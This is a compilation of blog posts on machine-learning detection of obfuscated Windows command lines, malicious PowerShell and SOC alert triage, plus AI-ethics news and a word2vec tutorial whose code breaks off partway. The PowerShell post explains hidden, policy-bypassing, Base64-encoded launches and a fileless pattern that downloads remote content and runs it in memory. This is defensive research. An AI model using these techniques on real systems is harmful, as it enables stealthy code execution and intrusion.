While neural networks can be used with feature data, one of the attractions of this approach is that it can work with raw data (converted into numeric form) without doing any feature design or extraction. The first step in the model is converting text data into numeric form. We used a character-based encoding where each character type was encoded by a real valued number. The value was automatically derived during training and conveys semantic information about the relationships between characters as they apply to cmd.exe syntax.

Feature-Based ML

We also experimented with hand-engineered features and a Gradient Boosted Decision Tree algorithm. The features developed for this model were largely statistical in nature – derived from the presence and frequency of character sets and keywords. For example, the presence of dozens of ‘%’ characters or long, contiguous strings might contribute to detecting potential obfuscation. While any single feature will not perfectly separate the two classes, a combination of features as present in a tree-based model can learn flexible patterns in the data. The expectation is that those patterns are robust and can generalize to future obfuscation variants.

Data and Experiments

To develop our models, we collected non-obfuscated data from tens of thousands of endpoint events and generated obfuscated data using a variety of methods in Invoke-DOSfuscation. We developed our models using roughly 80 percent of the data as training data, and tested them on the remaining 20 percent. We ensured that our train-test split was stratified. For featureless ML (i.e. neural networks), we simply input Unicode code points into the first layer of the CNN model. The first layer converts the code point into semantically meaningful numerical representations (called embeddings) before feeding it into the rest of the neural network.

For the Gradient Boosted Tree method, we generated a number of features from the raw command lines. The following are some of them:

  • Length of the command line
  • The number of carets in the command line
  • The count of pipe symbols
  • The fraction of white space in the command line
  • The fraction of special characters
  • Entropy of the string
  • The frequency of the strings “cmd” and “power” in the command line

While each of these features individually is a weak signal and could not possibly be a good discriminator on its own, a flexible classifier such as a Gradient Boosted Tree – trained on sufficient data with these features – is able to classify obfuscated and non-obfuscated command lines in spite of the aforementioned difficulties.

Results

Evaluated against our test set, we were able to get nearly identical results from our Gradient Boosted Tree and neural network models.

The results for the GBT model were near perfect with metrics such as F1-score, precision, and recall all being close to 1.0. The CNN model was slightly less accurate.

While we certainly do not expect perfect results in a real-world scenario, these lab results were nonetheless encouraging. Recall that all of our obfuscated examples were generated by one source, namely the Invoke-DOSfuscation tool. While Invoke-DOSfuscation generates a wide variety of obfuscated samples, in the real world we expect to see at least some samples that are quite dissimilar from any that Invoke-DOSfuscation generates. We are currently collecting real world obfuscated command lines to get a more accurate picture of the generalizability of this model on obfuscated samples from actual malicious actors. We expect that command obfuscation, similar to PowerShell obfuscation before it, will continue to emerge in new malware families.

As an additional test we asked Daniel Bohannon (author of Invoke-DOSfuscation, the Windows command line obfuscation tool) to come up with obfuscated samples that in his experience would be difficult for a traditional obfuscation detector. In every case, our ML detector was still able to detect obfuscation. Some examples are shown in Figure 8.


Figure 8: Some examples of obfuscated text used to test and attempt to defeat the ML obfuscation detector (all were correctly identified as obfuscated text)

We also created very cryptic looking texts that, although valid Windows command lines and non-obfuscated, appear slightly obfuscated to a human observer. This was done to test efficacy of the detector with boundary examples. The detector was correctly able to classify the text as non-obfuscated in this case as well. Figure 9 shows one such example.


Figure 9: An example that appears on first glance to be obfuscated, but isn't really and would likely fool a non-ML solution (however, the ML obfuscation detector currently identifies it as non-obfuscated)

Finally, Figure 10 shows a complicated yet non-obfuscated command line that is correctly classified by our obfuscation detector, but would likely fool a non-ML detector based on statistical features (for example a rule-based detector with a hand-crafted weighing scheme and a threshold, using features such as the proportion of special characters, length of the command line or entropy of the command line).


Figure 10: An example that would likely be misclassified by an ML detector that uses simplistic statistical features; however, our ML obfuscation detector currently identifies it as non-obfuscated

CNN vs. GBT Results

We compared the results of a heavily tuned GBT classifier built using carefully selected features to those of a CNN trained with raw data (featureless ML). While the CNN architecture was not heavily tuned, it is interesting to note that with samples such as those in Figure 10, the GBT classifier confidently predicted non-obfuscated with a score of 19.7 percent (the complement of the measure of the classifier’s confidence in non-obfuscation). Meanwhile, the CNN classifier predicted non-obfuscated with a confidence probability of 50 percent – right at the boundary between obfuscated and non-obfuscated. The number of misclassifications of the CNN model was also more than that of the Gradient Boosted Tree model. Both of these are most likely the result of inadequate tuning of the CNN, and not a fundamental shortcoming of the featureless approach.

Conclusion

In this blog post we described an ML approach to detecting obfuscated Windows command lines, which can be used as a signal to help identify malicious command line usage. Using ML techniques, we demonstrated a highly accurate mechanism for detecting such command lines without resorting to the often inadequate and costly technique of maintaining complex if-then rules and regular expressions. The more comprehensive ML approach is flexible enough to catch new variations in obfuscation, and when gaps are detected, it can usually be handled by adding some well-chosen evader samples to the training set and retraining the model.

This successful application of ML is yet another demonstration of the usefulness of ML in replacing complex manual or programmatic approaches to problems in computer security. In the years to come, we anticipate ML to take an increasingly important role both at FireEye and in the rest of the cyber security industry.

Ethics In Artificial Intelligence: Introducing The SHERPA Consortium

In May of this year, Horizon 2020 SHERPA project activities kicked off with a meeting in Brussels. F-Secure is a partner in the SHERPA consortium – a group consisting of 11 members from six European countries – whose mission is to understand how the combination of artificial intelligence and big data analytics will impact ethics and human rights issues today, and in the future (https://www.project-sherpa.eu/).

As part of this project, one of F-Secure’s first tasks will be to study security issues, dangers, and implications of the use of data analytics and artificial intelligence, including applications in the cyber security domain. This research project will examine:

  • ways in which machine learning systems are commonly mis-implemented (and recommendations on how to prevent this from happening)
  • ways in which machine learning models and algorithms can be adversarially attacked (and mitigations against such attacks)
  • how artificial intelligence and data analysis methodologies might be used for malicious purposes

We’ve already done a fair bit of this research*, so expect to see more articles on this topic in the near future!

 

As strange as it sounds, I sometimes find powerpoint a good tool for arranging my thoughts, especially before writing a long document. As an added bonus, I have a presentation ready to go, should I need it.

 

 

Some members of the SHERPA project recently attended WebSummit in Lisbon – a four day event with over 70,000 attendees and over 70 dedicated discussions and panels. Topics related to artificial intelligence were prevalent this year, ranging from tech presentations on how to develop better AI, to existential debates on the implications of AI on the environment and humanity. The event attracted a wide range of participants, including many technologists, politicians, and NGOs.

During WebSummit, SHERPA members participated in the Social Innovation Village, where they joined forces with projects and initiatives such as Next Generation Internet, CAPPSI, MAZI, DemocratieOuverte, grassroots radio, and streetwize to push for “more social good in technology and more technology in social good”. Here, SHERPA researchers showcased the work they’ve already done to deepen the debate on the implications of AI in policing, warfare, education, health and social care, and transport.

The presentations attracted the keen interest of representatives from more than 100 large and small organizations and networks in Europe and further afield, including the likes of Founder’s Institute, Google, and Amazon, and also led to a public commitment by Carlos Moedas, the European Commissioner for Research, Science and Innovation. You can listen to the highlights of the conversation here.

To get a preview of SHERPA’s scenario work and take part in the debate click here.

 


* If you’re wondering why I haven’t blogged in a long while, it’s because I’ve been hiding away, working on a bunch of AI-related research projects (such as this). Down the road, I’m hoping to post more articles and code – if and when I have results to share 😉

AI and the future of cybersecurity work

In February 2014, journalist Martin Wolf wrote a piece for the London Financial Times[1] titled Enslave the robots and free the poor. He began the piece with the following quote:

“In 1955, Walter Reuther, head of the US car workers’ union, told of a visit to a new automatically operated Ford plant. Pointing to all the robots, his host asked: How are you going to collect union dues from those guys? Mr. Reuther replied: And how are you going to get them to buy Fords?”

Near and long-term directions for adversarial AI in cybersecurity

The frenetic pace at which artificial intelligence (AI) has advanced in the past few years has begun to have transformative effects across a wide variety of fields. Coupled with an increasingly (inter)-connected world in which cyberattacks occur with alarming frequency and scale, it is no wonder that the field of cybersecurity has now turned its eye to AI and machine learning (ML) in order to detect and defend against adversaries.

The use of AI in cybersecurity not only expands the scope of what a single security expert is able to monitor, but importantly, it also enables the discovery of attacks that would have otherwise been undetectable by a human. Just as it was nearly inevitable that AI would be used for defensive purposes, it is undeniable that AI systems will soon be put to use for attack purposes.

Choosing an optimal algorithm for AI in cybersecurity

In the last blog post, we alluded to the No-Free-Lunch (NFL) theorems for search and optimization. While NFL theorems are criminally misunderstood and misrepresented in the service of crude generalizations intended to make a point, I intend to deploy a crude NFL generalization to make just such a point.

You see, NFL theorems (roughly) state that given a universe of problem sets where an algorithm’s goal is to learn a function that maps a set of input data X to a set of target labels Y, for any subset of problems where algorithm A outperforms algorithm B, there will be a subset of problems where B outperforms A. In fact, averaging their results over the space of all possible problems, the performance of algorithms A and B will be the same.

With some hand waving, we can construct an NFL theorem for the cybersecurity domain:  Over the set of all possible attack vectors that could be employed by a hacker, no single detection algorithm can outperform all others across the full spectrum of attacks.

Malicious PowerShell Detection via Machine Learning

Introduction

Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.

Background

PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).


Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.


Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).


Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates the following chunk of text is a base64 encoded command.

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.


Figure 4: The decoded command for the aforementioned example

Interestingly, the decoded command unveils a stealthy fileless network access and remote content execution!

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The downloadstring will download the contents from <url> into a memory buffer (which in turn IEX will execute).

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonym, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm will reduce the word to its original form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.


Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)

The overall NLP pipeline we developed is captured in the following table:

NLP Key Modules

Functionality

Decoder

Detect and decode any encoded text

Named Entity Recognition (NER)

Detect and recognize any entities such as IP, URL, Email, Registry key, etc.

Tokenizer

Tokenize the PowerShell command into a list of tokens

Stemmer

Stem tokens into semantically identical token, uses trie

Vocabulary Vectorizer

Vectorize the list of tokens into machine learning friendly format

Supervised classifier

Binary classification algorithms:

  • Kernel Support Vector Machine
  • Gradient Boosted Trees
  • Deep Neural Networks

Reasoning

The explanation of why the prediction was made. Enables analysts to validate predications.

The following are the key steps when streaming the aforementioned example through the NLP pipeline:

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model


Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command

More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.


Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.

Acknowledgements

We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.

Reverse Engineering the Analyst: Building Machine Learning Models for the SOC

Many cyber incidents can be traced back to an original alert that was either missed or ignored by the Security Operations Center (SOC) or Incident Response (IR) team. While most analysts and SOCs are vigilant and responsive, the fact is they are often overwhelmed with alerts. If a SOC is unable to review all the alerts it generates, then sooner or later, something important will slip through the cracks.

The core issue here is scalability. It is far easier to create more alerts than to create more analysts, and the cyber security industry is far better at alert generation than resolution. More intel feeds, more tools, and more visibility all add to the flood of alerts. There are things that SOCs can and should do to manage this flood, such as increasing automation of forensic tasks (pulling PCAP and acquiring files, for example) and using aggregation filters to group alerts into similar batches. These are effective strategies and will help reduce the number of required actions a SOC analyst must take. However, the decisions the SOC makes still form a critical bottleneck. This is the “Analyze/ Decide” block in Figure 1.


Figure 1: Basic SOC triage stages

In this blog post, we propose machine learning based strategies to help mitigate this bottleneck and take back control of the SOC. We have implemented these strategies in our FireEye Managed Defense SOC, and our analysts are taking advantage of this approach within their alert triaging workflow. In the following sections, we will describe our process to collect data, capture alert analysis, create a model, and build an efficacy workflow – all with the ultimate goal of automating alert triage and freeing up analyst time.

Reverse Engineering the Analyst

Every alert that comes into a SOC environment contains certain bits of information that an analyst uses to determine if the alert represents malicious activity. Often, there are well-paved analytical processes and pathways used when evaluating these forensic artifacts over time. We wanted to explore if, in an effort to truly scale our SOC operations, we could extract these analytical pathways, train a machine to traverse them, and potentially discover new ones.

Think of a SOC as a self-contained machine that inputs unlabeled alerts and outputs the alerts labeled as “malicious” or “benign”. How can we capture the analysis and determine that something is indeed malicious, and then recreate that analysis at scale? In other words, what if we could train a machine to make the same analytical decisions as an analyst, within an acceptable level of confidence?

Basic Supervised Model Process

The data science term for this is a “Supervised Classification Model”. It is “supervised” in the sense that it learns by being shown data already labeled as benign or malicious, and it is a “classification model” in the sense that once it has been trained, we want it to look at a new piece of data and make a decision between one of several discrete outcomes. In our case, we only want it to decide between two “classes” of alerts: malicious and benign.

In order to begin creating such a model, a dataset must be collected. This dataset forms the “experience” of the model, and is the information we will use to “train” the model to make decisions. In order to supervise the model, each unit of data must be labeled as either malicious or benign, so that the model can evaluate each observation and begin to figure out what makes something malicious versus what makes it benign. Typically, collecting a clean, labeled dataset is one of the hardest parts of the supervised model pipeline; however, in the case of our SOC, our analysts are constantly triaging (or “labeling”) thousands of alerts every week, and so we were lucky to have an abundance of clean, standardized, labeled alerts.

Once a labeled dataset has been defined, the next step is to define “features” that can be used to portray the information resident in each alert. A “feature” can be thought of as an aspect of a bit of information. For example, if the information is represented as a string, a natural “feature” could be the length of the string. The central idea behind building features for our alert classification model was to find a way to represent and record all the aspects that an analyst might consider when making a decision.

Building the model then requires choosing a model structure to use, and training the model on a subset of the total data available. The larger and more diverse the training data set, generally the better the model will perform. The remaining data is used as a “test set” to see if the trained model is indeed effective. Holding out this test set ensures the model is evaluated on samples it has never seen before, but for which the true labels are known.

Finally, it is critical to ensure there is a way to evaluate the efficacy of the model over time, as well as to investigate mistakes so that appropriate adjustments can be made. Without a plan and a pipeline to evaluate and retrain, the model will almost certainly decay in performance.

Feature Engineering

Before creating any of our own models, we interviewed experienced analysts and documented the information they typically evaluate before making a decision on an alert. Those interviews formed the basis of our feature extraction. For example, when an analyst says that reviewing an alert is “easy”, we ask: “Why? And what helps you make that decision?” It is this reverse engineering of sorts that gives insight into features and models we can use to capture analysis.

For example, consider a process execution event. An alert on a potentially malicious process execution may contain the following fields:

  • Process Path
  • Process MD5
  • Parent Process
  • Process Command Arguments

While this may initially seem like a limited feature space, there is a lot of useful information that one can extract from these fields.

Beginning with the process path of, say, “C:\windows\temp\m.exe”, an analyst can immediately see some features:

  • The process resides in a temporary folder: C:\windows\temp\
  • The process is two directories deep in the file system
  • The process executable name is one character long
  • The process has an .exe extension
  • The process is not a “common” process name

While these may seem simple, over a vast amount of data and examples, extracting these bits of information will help the model to differentiate between events. Even the most basic aspects of an artifact must be captured in order to “teach” the model to view processes the way an analyst does.

The features are then encoded into a more discrete representation, similar to this:

Temp_folder

Depth

Name_Length

Extension

common_process_name

TRUE

2

1

exe

FALSE

Another important feature to consider about a process execution event is the combination of parent process and child process. Deviation from expected “lineage” can be a strong indicator of malicious activity.

Say the parent process of the aforementioned example was ‘powershell.exe’. Potential new features could then be derived from the concatenation of the parent process and the process itself: ‘powershell.exe_m.exe’. This functionally serves as an identity for the parent-child relation and captures another key analysis artifact.

The richest field, however, is probably the process arguments. Process arguments are their own sort of language, and language analysis is a well-tread space in predictive analytics.

We can look for things including, but not limited to:

  • Network connection strings (such as ‘http://’, ‘https://’, ‘ftp://’).
  • Base64 encoded commands
  • Reference to Registry Keys (‘HKLM’, ‘HKCU’)
  • Evidence of obfuscation (ticks, $, semicolons) (read Daniel Bohannon’s work for more)

The way these features and their values appear in a training dataset will define the way the model learns. Based on the distribution of features across thousands of alerts, relationships will start to emerge between features and labels. These relationships will then be recorded in our model, and ultimately used to influence the predictions for new alerts. Looking at distributions of features in the training set can give insight into some of these potential relationships.

For example, Figure 2 shows how the distribution of Process Command Length may appear when grouping by malicious (red) and benign (blue).


Figure 2: Distribution of Process Event alerts grouped by Process Command Length

This graph shows that over a subset of samples, the longer the command length, the more likely it is to be malicious. This manifests as red on the right and blue on the left. However, process length is not the only factor.

As part of our feature set, we also thought it would be useful to approximate the “complexity” of each command. For this, we used “Shannon entropy”, a commonly used metric that measures the degree of randomness present in a string of characters.

Figure 3 shows a distribution of command entropy, broken out into malicious and benign. While the classes do not separate entirely, we can see that for this sample of data, samples with higher entropy generally have a higher chance of being malicious.


Figure 3: Distribution of Process Event alerts grouped by entropy

Model Selection and Generalization

Once features have been generated for the whole dataset, it is time to use them to train a model. There is no perfect procedure for picking the best model, but looking at the type of features in our data can help narrow it down. In the case of a process event, we have a combination of features represented as strings and numbers. When an analyst evaluates each artifact, they ask questions about each of these features, and combine the answers to estimate the probability that the process is malicious.

For our use case, it also made sense to prioritize an ‘interpretable’ model – that is, one that can more easily expose why it made a certain decision about an artifact. This way analysts can build confidence in the model, as well as detect and fix analytical mistakes that the model is making. Given the nature of the data, the decisions analysts make, and the desire for interpretability, we felt that a decision tree-based model would be well-suited for alert classification.

There are many publicly available resources to learn about decision trees, but the basic intuition behind a decision tree is that it is an iterative process, asking a series of questions to try to arrive at a highly confident answer. Anyone who has played the game “Twenty Questions” is familiar with this concept. Initially, general questions are asked to help eliminate possibilities, and then more specific questions are asked to narrow down the possibilities. After enough questions are asked and answered, the ‘questioner’ feels they have a high probability of guessing the right answer.

Figure 4 shows an example of a decision tree that one might use to evaluate process executions.


Figure 4: Decision tree for deciding whether an alert is benign or malicious

For the example alert in the diagram, the “decision path” is marked in red. This is how this decision tree model makes a prediction. It first asks: “Is the length greater than 100 characters?” If so, it moves to the next question “Does it contain the string ‘http’?” and so on until it feels confident in making an educated guess. In the example in Figure 4, given that 95 percent of all the training alerts traveling this decision path were malicious, the model predicts a 95 percent chance that this alert will also be malicious.

Because they can ask such detailed combinations of questions, it is possible that decision trees can “overfit”, or learn rules that are too closely tied to the training set. This reduces the model’s ability to “generalize” to new data. One way to mitigate this effect is to use many slightly different decision trees and have them each “vote” on the outcome. This “ensemble” of decision trees is called a Random Forest, and it can improve performance for the model when deployed in the wild. This is the algorithm we ultimately chose for our model.

How the SOC Alert Model Works

When a new alert appears, the data in the artifact is transformed into a vector of the encoded features, with the same structure as the feature representations used to train the model. The model then evaluates this “feature vector” and applies a confidence level for the predicted label. Based on thresholds we set, we can then classify the alert as malicious or benign.


Figure 5: An alert presented to the analyst with its raw values captured

As an example, the event shown in Figure 5 might create the following feature values:

  • Parent Process: ‘wscript’
  • Command Entropy: 5.08
  • Command Length =103

Based on how they were trained, the trees in the model each ask a series of questions of the new feature vector. As the feature vector traverses each tree, it eventually converges on a terminal “leaf” classifying it as either benign or malicious. We can then evaluate the aggregated decisions made by each tree to estimate which features in the vector played the largest role in the ultimate classification.

For the analysts in the SOC, we then present the features extracted from the model, showing the distribution of those features over the entire dataset. This gives the analysts insight into “why” the model thought what it thought, and how those features are represented across all alerts we have seen. For example, the “explanation” for this alert might look like:

  • Command Entropy = 5.08 > 4.60:  51.73% Threat
  • occuranceOfChar “\”= 9.00 > 4.50:  64.09% Threat
  • occuranceOfChar:“)” (=0.00) <= 0.50: 78.69% Threat
  • NOT processTree=”cmd.exe_to_cscript.exe”: 99.6% Threat

Thus, at the time of analysis, the analysts can see the raw data of the event, the prediction from the model, an approximation of the decision path, and a simplified, interpretable view of the overall feature importance.

How the SOC Uses the Model

Showing the features the model used to reach the conclusion allows experienced analysts to compare their approach with the model, and give feedback if the model is doing something wrong. Conversely, a new analyst may learn to look at features they may have otherwise missed: the parent-child relationship, signs of obfuscation, or network connection strings in the arguments. After all, the model has learned on the collective experience of every analyst over thousands of alerts. Therefore, the model provides an actionable reflection of the aggregate analyst experience back to the SOC, so that each analyst can transitively learn from their colleagues.

Additionally, it is possible to write rules using the output of the model as a parameter. If the model is particularly confident on a subset of alerts, and the SOC feels comfortable automatically classifying that family of threats, it is possible to simply write a rule to say: “If the alert is of this type, AND for this malware family, AND the model confidence is above 99, automatically call this alert bad and generate a report.” Or, if there is a storm of probable false positives, one could write a rule to cull the herd of false positives using a model score below 10.

How the Model Stays Effective

The day the model is trained, it stops learning. However, threats – and therefore alerts – are constantly evolving. Thus, it is imperative to continually retrain the model with new alert data to ensure it continues to learn from changes in the environment.

Additionally, it is critical to monitor the overall efficacy of the model over time. Building an efficacy analysis pipeline to compare model results against analyst feedback will help identify if the model is beginning to drift or develop structural biases. Evaluating and incorporating analyst feedback is also critical to identify and address specific misclassifications, and discover potential new features that may be necessary.

To accomplish these goals, we run a background job that updates our training database with newly labeled events. As we get more and more alerts, we periodically retrain our model with the new observations. If we encounter issues with accuracy, we diagnose and work to address them. Once we are satisfied with the overall accuracy score of our retrained model, we store the model object and begin using that model version.

We also provide a feedback mechanism for analysts to record when the model is wrong. An analyst can look at the label provided by the model and the explanation, but can also make their own decision. Whether they agree with the model or not, they can input their own label through the interface. We store this label provided by the analyst along with any optional explanation given by them regarding the explanation.

Finally, it should be noted that these manual labels may require further evaluation. As an example, consider a commodity malware alert, in which network command and control communications were sinkholed. An analyst may evaluate the alert, pull back triage details, including PCAP samples, and see that while the malware executed, the true threat to the environment was mitigated. Since it does not represent an exigent threat, the analyst may mark this alert as ‘benign’. However, the fact that it was sinkholed does not change that the artifacts of execution still represent malicious activity. Under different circumstances, this infection could have had a negative impact on the organization. However, if the benign label is used when retraining the model, that will teach the model that something inherently malicious is in fact benign, and potentially lead to false negatives in the future.

Monitoring efficacy over time, updating and retraining the model with new alerts, and evaluating manual analyst feedback gives us visibility into how the model is performing and learning over time. Ultimately this helps to build confidence in the model, so we can automate more tasks and free up analyst time to perform tasks such as hunting and investigation.

Conclusion

A supervised learning model is not a replacement for an experienced analyst. However, incorporating predictive analytics and machine learning into the SOC workflow can help augment the productivity of analysts, free up time, and ensure they utilize investigative skills and creativity on the threats that truly require expertise.

This blog post outlines the major components and considerations of building an alert classification model for the SOC. Data collection, labeling, feature generation, model training, and efficacy analysis must all be carefully considered when building such a model. FireEye continues to iterate on this research to improve our detection and response capabilities, continually improve the detection efficacy of our products, and ultimately protect our clients.

The process and examples shown discussed in this post are not mere research. Within our FireEye Managed Defense SOC, we use alert classification models built using the aforementioned processes to increase our efficiency and ensure we apply our analysts’ expertise where it is needed most. In a world of ever increasing threats and alerts, increasing SOC efficiency may mean the difference between missing and catching a critical intrusion.

Acknowledgements

A big thank you to Seth Summersett and Clara Brooks.

***

The FireEye ICE Data Science Team is a small, highly trained team of data scientists and engineers, focused on delivering impactful capabilities to our analysts, products, and customers. ICE-DS is always looking for exceptional candidates interested in researching and solving difficult problems in cybersecurity. If you’re interested, check out  FireEye careers.

NLP Analysis Of Tweets Using Word2Vec And T-SNE

In the context of some of the Twitter research I’ve been doing, I decided to try out a few natural language processing (NLP) techniques. So far, word2vec has produced perhaps the most meaningful results. Wikipedia describes word2vec very precisely:

“Word2vec takes as its input a large corpus of text and produces a vector space, typically of several hundred dimensions, with each unique word in the corpus being assigned a corresponding vector in the space. Word vectors are positioned in the vector space such that words that share common contexts in the corpus are located in close proximity to one another in the space.”

During the two weeks leading up to the  January 2018 Finnish presidential elections, I performed an analysis of user interactions and behavior on Twitter, based on search terms relevant to that event. During the course of that analysis, I also dumped each Tweet’s raw text field to a text file, one item per line. I then wrote a small tool designed to preprocess the collected Tweets, feed that processed data into word2vec, and finally output some visualizations. Since word2vec creates multidimensional tensors, I’m using T-SNE for dimensionality reduction (the resulting visualizations are in two dimensions, compared to the 200 dimensions of the original data.)

The rest of this blog post will be devoted to listing and explaining the code used to perform these tasks. I’ll present the code as it appears in the tool. The code starts with a set of functions that perform processing and visualization tasks. The main routine at the end wraps everything up by calling each routine sequentially, passing artifacts from the previous step to the next one. As such, you can copy-paste each section of code into an editor, save the resulting file, and the tool should run (assuming you’ve pip installed all dependencies.) Note that I’m using two spaces per indent purely to allow the code to format neatly in this blog. Let’s start, as always, with importing dependencies. Off the top of my head, you’ll probably want to install tensorflow, gensim, six, numpy, matplotlib, and sklearn (although I think some of these install as part of tensorflow’s installation).

# -*- coding: utf-8 -*-
from tensorflow.contrib.tensorboard.plugins import projector
from sklearn.manifold import TSNE
from collections import Counter
from six.moves import cPickle
import gensim.models.word2vec as w2v
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
import multiprocessing
import os
import sys
import io
import re
import json

The next listing contains a few helper functions. In each processing step, I like to save the output. I do this for two reasons. Firstly, depending on the size of your raw data, each step can take some time. Hence, if you’ve performed the step once, and saved the output, it can be loaded from disk to save time on subsequent passes. The second reason for saving each step is so that you can examine the output to check that it looks like what you want. The try_load_or_process() function attempts to load the previously saved output from a function. If it doesn’t exist, it runs the function and then saves the output. Note also the rather odd looking implementation in save_json(). This is a workaround for the fact that json.dump() errors out on certain non-ascii characters when paired with io.open().

def try_load_or_process(filename, processor_fn, function_arg):
  load_fn = None
  save_fn = None
  if filename.endswith("json"):
    load_fn = load_json
    save_fn = save_json
  else:
    load_fn = load_bin
    save_fn = save_bin
  if os.path.exists(filename):
    return load_fn(filename)
  else:
    ret = processor_fn(function_arg)
    save_fn(ret, filename)
    return ret

def print_progress(current, maximum):
  sys.stdout.write("\r")
  sys.stdout.flush()
  sys.stdout.write(str(current) + "/" + str(maximum))
  sys.stdout.flush()

def save_bin(item, filename):
  with open(filename, "wb") as f:
    cPickle.dump(item, f)

def load_bin(filename):
  if os.path.exists(filename):
    with open(filename, "rb") as f:
      return cPickle.load(f)

def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
  ret = None
  if os.path.exists(filename):
    try:
      with io.open(filename, "r", encoding="utf-8") as f:
        ret = json.load(f)
    except:
      pass
  return ret

